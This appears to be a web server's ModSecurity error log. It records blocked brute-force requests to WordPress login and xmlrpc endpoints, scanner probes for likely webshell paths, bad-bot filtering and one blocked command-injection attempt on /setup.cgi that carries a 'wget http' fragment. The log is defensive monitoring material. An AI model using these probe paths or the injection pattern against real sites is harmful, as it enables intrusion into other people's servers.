[Tue May 26 16:01:12.597570 2026] [security2:error] [pid 762634:tid 762816] [client 191.101.157.243:55914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahV2cLx8rj1VZMqUAOdwcwAAADQ"]
[Tue May 26 16:01:14.052395 2026] [security2:error] [pid 762634:tid 762766] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2cbx8rj1VZMqUAOdwkAAAAAI"]
[Tue May 26 16:01:14.519675 2026] [security2:error] [pid 762634:tid 762773] [client 185.191.171.3:13726] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahV2crx8rj1VZMqUAOdwoAAAAAk"]
[Tue May 26 16:01:14.519805 2026] [security2:error] [pid 762634:tid 762773] [client 185.191.171.3:13726] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahV2crx8rj1VZMqUAOdwoAAAAAk"]
[Tue May 26 16:01:14.922600 2026] [security2:error] [pid 762634:tid 762781] [client 106.219.85.83:14124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2crx8rj1VZMqUAOdwqAAAABE"]
[Tue May 26 16:01:14.922722 2026] [security2:error] [pid 762634:tid 762781] [client 106.219.85.83:14124] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2crx8rj1VZMqUAOdwqAAAABE"]
[Tue May 26 16:01:15.460013 2026] [security2:error] [pid 762634:tid 762854] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2c7x8rj1VZMqUAOdwtQAAAFo"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 16:01:15.464836 2026] [security2:error] [pid 762634:tid 762840] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2c7x8rj1VZMqUAOdwrgAAAEw"]
[Tue May 26 16:01:15.719969 2026] [security2:error] [pid 762634:tid 762727] [remote 103.145.62.145:12701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV2c7x8rj1VZMqUAOdwvQAAUlw"]
[Tue May 26 16:01:15.927535 2026] [security2:error] [pid 762634:tid 762845] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2c7x8rj1VZMqUAOdwxgAAAFE"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 16:01:17.122008 2026] [security2:error] [pid 762634:tid 762805] [client 103.44.52.196:33550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2dbx8rj1VZMqUAOdw4wAAACk"]
[Tue May 26 16:01:17.122133 2026] [security2:error] [pid 762634:tid 762805] [client 103.44.52.196:33550] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2dbx8rj1VZMqUAOdw4wAAACk"]
[Tue May 26 16:01:18.021956 2026] [security2:error] [pid 762634:tid 762854] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2dbx8rj1VZMqUAOdw8gAAAFo"]
[Tue May 26 16:01:18.819528 2026] [security2:error] [pid 762634:tid 762869] [client 31.57.184.107:63716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.homesehouse.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV2drx8rj1VZMqUAOdxEwAAAGk"]
[Tue May 26 16:01:19.720119 2026] [security2:error] [pid 762634:tid 762868] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2d7x8rj1VZMqUAOdxJgAAAGg"]
[Tue May 26 16:01:20.158927 2026] [security2:error] [pid 762634:tid 762848] [client 103.153.130.62:54677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2eLx8rj1VZMqUAOdxQAAAAFQ"]
[Tue May 26 16:01:20.159050 2026] [security2:error] [pid 762634:tid 762848] [client 103.153.130.62:54677] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2eLx8rj1VZMqUAOdxQAAAAFQ"]
[Tue May 26 16:01:21.337988 2026] [security2:error] [pid 762634:tid 762851] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2eLx8rj1VZMqUAOdxVQAAAFc"]
[Tue May 26 16:01:23.066042 2026] [security2:error] [pid 762634:tid 762837] [client 77.68.83.86:55955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/images/images/cache.php"] [unique_id "ahV2e7x8rj1VZMqUAOdxiAAAAEk"], referer: www.google.com
[Tue May 26 16:01:23.198607 2026] [security2:error] [pid 762634:tid 762750] [remote 57.141.2.3:28432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV2e7x8rj1VZMqUAOdxiQAAUXM"]
[Tue May 26 16:01:23.846525 2026] [security2:error] [pid 762634:tid 762871] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2e7x8rj1VZMqUAOdxmwAAAGs"]
[Tue May 26 16:01:24.074813 2026] [security2:error] [pid 762634:tid 762756] [remote 94.76.235.103:56244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahV2fLx8rj1VZMqUAOdxsAAAdnk"]
[Tue May 26 16:01:25.340760 2026] [security2:error] [pid 762634:tid 762841] [client 77.68.83.86:50051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/images/images/cache.php"] [unique_id "ahV2fbx8rj1VZMqUAOdxyAAAAE0"], referer: www.google.com
[Tue May 26 16:01:25.541135 2026] [security2:error] [pid 762634:tid 762863] [client 106.219.85.83:32619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2fbx8rj1VZMqUAOdx0QAAAGM"]
[Tue May 26 16:01:25.541379 2026] [security2:error] [pid 762634:tid 762863] [client 106.219.85.83:32619] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2fbx8rj1VZMqUAOdx0QAAAGM"]
[Tue May 26 16:01:26.013461 2026] [security2:error] [pid 762634:tid 762792] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2fbx8rj1VZMqUAOdx1wAAABw"]
[Tue May 26 16:01:27.462993 2026] [security2:error] [pid 762634:tid 762865] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2f7x8rj1VZMqUAOdx_gAAAGU"]
[Tue May 26 16:01:29.501516 2026] [security2:error] [pid 762634:tid 762775] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2gbx8rj1VZMqUAOdyMgAAAAs"]
[Tue May 26 16:01:30.447189 2026] [security2:error] [pid 762634:tid 762798] [client 103.153.130.62:55030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2grx8rj1VZMqUAOdyXQAAACI"]
[Tue May 26 16:01:30.447607 2026] [security2:error] [pid 762634:tid 762798] [client 103.153.130.62:55030] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2grx8rj1VZMqUAOdyXQAAACI"]
[Tue May 26 16:01:31.374286 2026] [security2:error] [pid 762634:tid 762831] [client 103.44.52.196:33024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2g7x8rj1VZMqUAOdycQAAAEM"]
[Tue May 26 16:01:31.374384 2026] [security2:error] [pid 762634:tid 762831] [client 103.44.52.196:33024] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2g7x8rj1VZMqUAOdycQAAAEM"]
[Tue May 26 16:01:32.256161 2026] [security2:error] [pid 762634:tid 762884] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2g7x8rj1VZMqUAOdyhAAAAHg"]
[Tue May 26 16:01:34.396932 2026] [security2:error] [pid 762634:tid 762825] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2hbx8rj1VZMqUAOdyygAAAD0"]
[Tue May 26 16:01:36.017298 2026] [security2:error] [pid 762634:tid 762780] [client 106.219.85.83:30941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2iLx8rj1VZMqUAOdzGAAAABA"]
[Tue May 26 16:01:36.017520 2026] [security2:error] [pid 762634:tid 762780] [client 106.219.85.83:30941] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2iLx8rj1VZMqUAOdzGAAAABA"]
[Tue May 26 16:01:36.267841 2026] [security2:error] [pid 762634:tid 762870] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2h7x8rj1VZMqUAOdzEAAAAGo"]
[Tue May 26 16:01:38.289248 2026] [security2:error] [pid 762634:tid 762831] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ibx8rj1VZMqUAOdzUgAAAEM"]
[Tue May 26 16:01:40.299045 2026] [security2:error] [pid 762634:tid 762859] [client 109.155.26.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2i7x8rj1VZMqUAOdzogAAAF8"]
[Tue May 26 16:01:40.498591 2026] [security2:error] [pid 762634:tid 762845] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2jLx8rj1VZMqUAOdzqwAAAFE"]
[Tue May 26 16:01:41.015481 2026] [security2:error] [pid 762634:tid 762876] [client 103.153.130.62:55332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2jLx8rj1VZMqUAOdzvwAAAHA"]
[Tue May 26 16:01:41.015657 2026] [security2:error] [pid 762634:tid 762876] [client 103.153.130.62:55332] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2jLx8rj1VZMqUAOdzvwAAAHA"]
[Tue May 26 16:01:42.941690 2026] [security2:error] [pid 762634:tid 762884] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2jrx8rj1VZMqUAOdz7AAAAHg"]
[Tue May 26 16:01:44.418400 2026] [security2:error] [pid 762634:tid 762772] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2kLx8rj1VZMqUAOd0LAAAAAg"]
[Tue May 26 16:01:45.346590 2026] [security2:error] [pid 762634:tid 762883] [client 103.44.52.196:36666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2kbx8rj1VZMqUAOd0TgAAAHc"]
[Tue May 26 16:01:45.346726 2026] [security2:error] [pid 762634:tid 762883] [client 103.44.52.196:36666] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2kbx8rj1VZMqUAOd0TgAAAHc"]
[Tue May 26 16:01:45.862290 2026] [security2:error] [pid 762634:tid 762834] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2kbx8rj1VZMqUAOd0UQAAAEY"]
[Tue May 26 16:01:46.590311 2026] [security2:error] [pid 762634:tid 762821] [client 106.219.85.83:32901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2krx8rj1VZMqUAOd0eQAAADk"]
[Tue May 26 16:01:46.590439 2026] [security2:error] [pid 762634:tid 762821] [client 106.219.85.83:32901] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2krx8rj1VZMqUAOd0eQAAADk"]
[Tue May 26 16:01:48.374387 2026] [security2:error] [pid 762634:tid 762838] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2k7x8rj1VZMqUAOd0lgAAAEo"]
[Tue May 26 16:01:49.076484 2026] [proxy:warn] [pid 762634:tid 762835] [client 185.242.226.110:61727] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 16:01:49.076528 2026] [proxy:error] [pid 762634:tid 762835] (70014)End of file found: [client 185.242.226.110:61727] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 185.242.226.110 ()
[Tue May 26 16:01:49.615114 2026] [security2:error] [pid 762634:tid 762855] [client 185.249.104.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2lbx8rj1VZMqUAOd0vwAAAFs"]
[Tue May 26 16:01:50.566794 2026] [security2:error] [pid 762634:tid 762790] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2lrx8rj1VZMqUAOd03gAAABo"]
[Tue May 26 16:01:50.741325 2026] [security2:error] [pid 762634:tid 762888] [client 103.44.52.196:47390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2lrx8rj1VZMqUAOd07wAAAHw"]
[Tue May 26 16:01:50.741474 2026] [security2:error] [pid 762634:tid 762888] [client 103.44.52.196:47390] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2lrx8rj1VZMqUAOd07wAAAHw"]
[Tue May 26 16:01:51.072806 2026] [security2:error] [pid 762634:tid 762780] [client 37.60.244.188:53155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV2lrx8rj1VZMqUAOd05QAAABA"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:01:51.254449 2026] [security2:error] [pid 762634:tid 762835] [client 103.153.130.62:55610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2l7x8rj1VZMqUAOd0_QAAAEc"]
[Tue May 26 16:01:51.254575 2026] [security2:error] [pid 762634:tid 762835] [client 103.153.130.62:55610] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2l7x8rj1VZMqUAOd0_QAAAEc"]
[Tue May 26 16:01:52.034853 2026] [security2:error] [pid 762634:tid 762781] [client 5.255.126.59:48672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahV2l7x8rj1VZMqUAOd1EgAAABE"]
[Tue May 26 16:01:52.309843 2026] [security2:error] [pid 762634:tid 762843] [client 147.53.116.161:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2mLx8rj1VZMqUAOd1IgAAAE8"], referer: https://www.anujtradingco.com/
[Tue May 26 16:01:52.472797 2026] [security2:error] [pid 762634:tid 762799] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2mLx8rj1VZMqUAOd1GQAAACM"]
[Tue May 26 16:01:52.882003 2026] [security2:error] [pid 762634:tid 762831] [client 223.123.41.70:54389] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "cuatrodoce.com.mx"] [uri "/setup.cgi"] [unique_id "ahV2mLx8rj1VZMqUAOd1MAAAAEM"]
[Tue May 26 16:01:52.882661 2026] [security2:error] [pid 762634:tid 762831] [client 223.123.41.70:54389] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data " wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "cuatrodoce.com.mx"] [uri "/setup.cgi"] [unique_id "ahV2mLx8rj1VZMqUAOd1MAAAAEM"]
[Tue May 26 16:01:52.882759 2026] [security2:error] [pid 762634:tid 762831] [client 223.123.41.70:54389] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "cuatrodoce.com.mx"] [uri "/setup.cgi"] [unique_id "ahV2mLx8rj1VZMqUAOd1MAAAAEM"]
[Tue May 26 16:01:52.995345 2026] [security2:error] [pid 762634:tid 762884] [client 5.255.126.59:48648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2mLx8rj1VZMqUAOd1LgAAAHg"], referer: https://jhonweb.com/asset-manifest.json
